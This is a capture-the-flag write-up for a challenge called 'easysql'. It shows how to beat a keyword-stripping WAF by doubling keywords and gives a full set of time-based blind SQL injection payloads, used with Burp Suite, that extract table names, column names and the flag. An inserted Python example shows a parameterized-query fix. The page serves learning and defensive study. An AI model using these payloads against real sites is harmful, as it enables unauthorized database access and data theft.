An SQL blind injection practice: easysql writeup

Preface

This is a CTF web penetration challenge: you need to get into the database, retrieve the correct flag and submit it.

1. Preliminary observation

Enter an arbitrary account and password, and the page echoes a piece of PHP code. It appears we need to construct an SQL injection string that gets past the WAF function's checks.
The WAF function replaces keywords such as select and or with empty strings to prevent SQL injection.

2. Inspect the request

Capturing the traffic with Fiddler and looking at the network request shows that this is a form-based POST request.

3. Guess the quoting used to close the string

Construct the submitted parameter:

' oor 1=1 #

The page responds normally, so it seems the string is not closed with a single quotation mark. The reason for writing or as oorr here is to bypass the WAF: the WAF function replaces or with "", and what remains after the replacement is still or, so the filter is bypassed.
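As an added illustration (not code from this writeup or the challenge), the following Python models the single-pass keyword-stripping WAF described above and contrasts it with a parameterized query. The keyword list and the users table are assumptions; only the four keywords the page's payloads reveal are modelled.

```python
import re
import sqlite3

# Keywords the WAF is said to blank out (case-insensitive). The challenge's full
# list is not on the page; these are the ones its payloads reveal (assumption).
BLACKLIST = ("select", "where", "flag", "or")

def strip_once(value: str) -> str:
    """Model of the challenge WAF: each keyword is deleted in a single pass.
    Deleting 'or' from 'oorr' leaves 'or', which is exactly why doubling works."""
    for kw in BLACKLIST:
        value = re.sub(re.escape(kw), "", value, flags=re.IGNORECASE)
    return value

def reject_if_blacklisted(value: str):
    """Rejecting instead of rewriting closes the doubling trick, but a substring
    blacklist still breaks ordinary input: 'world' and 'password' contain 'or'."""
    low = value.lower()
    return None if any(kw in low for kw in BLACKLIST) else value

def make_db() -> sqlite3.Connection:
    """Constructed in-memory sample standing in for the challenge's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
                 "username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 's3cret')")
    return conn

def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The real fix: bound parameters. The input is passed to the driver as data,
    so quotes, 'or 1=1' and comment markers are never parsed as SQL."""
    row = conn.execute(
        "SELECT id FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row is not None
```

The filter output for the payload above is the plain `" or 1=1 #` string, while the parameterized login treats the same string as a literal password and simply fails.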

Construct the submitted parameter:

" oorr 1=1 #

The page content now becomes: admin 35f1eeffabbb28113be22ca2eb810d6a

Trying to log in with this account and password turns out to be useless. It is not that simple.

We can only proceed step by step with the conventional blind injection method.

4. Switch to Burp Suite

5. Time-based blind injection: database name length

222 " oorr if(length(database())=§len§,sleep(5),1) #

After clicking Start attack, we can see that the database name is 7 characters long.

6. Time-based blind injection: database name

222 " oorr if(ascii(substring(database(),§index§,1))=§value§,sleep(5),1)#

After sorting the results by length, the database name is easysql.

7. Guess the number of database tables

222 " oorr if((sselectelect count(table_name) frroom infoorrmation_schema.tables wwherehere table_schema=database() )=§len§,sleep(2),1)#

The number of tables in the database is 2.

7. Time-based blind injection: length of the first table name

The length obtained is 4.

222 " oorr if(length(substr((sselectelect table_name frroom infoorrmation_schema.tables wwherehere table_schema=database() limit 0,1),1))=§len§,sleep(5),1)#

8. Time-based blind injection: length of the second table name

The length obtained is 5.

222 " oorr if(length(substr((sselectelect table_name frroom infoorrmation_schema.tables wwherehere table_schema=database() limit 1,2),1))=§len§,sleep(5),1)#

9. Time-based blind injection: the first table name

The table name obtained is flag.

222 " oorr if(ascii(substr((sselectelect table_name frroom infoorrmation_schema.tables wwherehere table_schema=database() limit 0,1),§index§,1))=§value§,sleep(5),1)#

10. Time-based blind injection: the second table name

222 " oorr if(ascii(substr((sselectelect table_name frroom infoorrmation_schema.tables wwherehere table_schema=database() limit 1,2),§index§,1))=§value§,sleep(5),1)#

11. Time-based blind injection: number of fields in the flag table

Since our final goal is to get the correct flag, and we guess the flag is stored in the flag table, we next go after the flag table.

First, guess the number of fields in the flag table; there are 2.

222 " oorr if((sselectelect count(column_name) frroom infoorrmation_schema.columns wwherehere table_name= 'fflaglag')=§len§,sleep(5),1) #

12. Time-based blind injection: length of the first field name in the flag table

The length obtained is 2.

222 " oorr if(length(substr((sselectelect column_name frroom infoorrmation_schema.columns wwherehere table_name= 'fflaglag' limit 0,1),1))=§len§,sleep(1),1)#

13. Time-based blind injection: name of the first field in the flag table

The first field is named id.

222 " oorr if(ascii(substr((sselectelect column_name frroom infoorrmation_schema.columns wwherehere table_name= 'fflaglag' limit 0,1),§index§,1))=§value§,sleep(1),1)#

14. Time-based blind injection: name of the second field in the flag table

The second field is named flag.

222 " oorr if(ascii(substr((sselectelect column_name frroom infoorrmation_schema.columns wwherehere table_name= 'fflaglag' limit 1,2),§index§,1))=§value§,sleep(1),1)#

15. Time-based blind injection: number of records in the flag table

There is only one record in the table.

222 " oorr if((sselectelect count(*) frroom fflaglag)=§count§,sleep(3),1)#

16. Time-based blind injection: length of the flag field in the flag table

The flag value is 38 characters long.

222 " oorr if(length(substr((sselectelect fflaglag frroom fflaglag limit 0,1),1))=§len§,sleep(3),1)#

17. Time-based blind injection: the flag value

flag{d7edeb1366bd99aa12d109c99267e37e}

222 " oorr if(ascii(substr((sselectelect fflaglag frroom fflaglag limit 0,1),§index§,1))=§value§,sleep(3),1)#

Posted by JayLewis on Wed, 24 Nov 2021 06:59:10 -0800